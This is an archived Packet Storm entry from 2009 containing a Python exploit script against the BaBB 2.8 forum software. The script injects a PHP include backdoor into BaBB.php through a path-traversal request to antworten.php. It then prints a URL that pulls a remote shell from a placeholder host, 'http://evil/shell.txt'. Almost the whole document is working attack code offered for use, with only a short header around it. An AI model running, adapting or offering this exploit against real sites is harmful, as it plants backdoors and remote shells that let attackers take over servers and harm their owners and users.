BaBB 2.8 Code Injection

2009-08-18T00:00:00
ID PACKETSTORM:80451
Type packetstorm
Reporter IRCRASH
Modified 2009-08-18T00:00:00

Description

                                        
                                            `#!usr/bin/python  
#####################################################################################  
#### BaBB 2.8 Full Code Injection Exploit ####  
#####################################################################################  
# #  
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #  
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #  
#Our Site : http://IrCrash.com #  
#My Official WebSite : http://R3dW0rm.ir #  
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #  
#####################################################################################  
# #  
#Download : http://sunet.dl.sourceforge.net/project/babb/BaBB%20Full/BaBB%202.8/BaBB_2.8_full.zip  
# #  
#Dork : :( #  
# #  
###################################### TNX GOD ######################################  
import sys,urllib  
if len(sys.argv) < 2 :  
print "Powered by : R3d.W0rm"  
print "http://IrCrash.com - http://R3dW0rm.ir"  
print "Usage : expl.py http://[target]/[path]"  
exit()  
data = urllib.urlopen(sys.argv[1] + '/antworten.php?send=true&code=/../../../BaBB.php&name=<?php%20if($_GET[\'t\']==1){include%20$_GET[\'f\'];}/*').read()  
if data != '' :  
print "Powered by : R3d.W0rm"  
print "http://IrCrash.com - http://R3dW0rm.ir\n\r"  
print sys.argv[1] + "/BaBB.php?t=1&f=http://evil/shell.txt"  
exit()  
print 'Attack failed.'  
  
`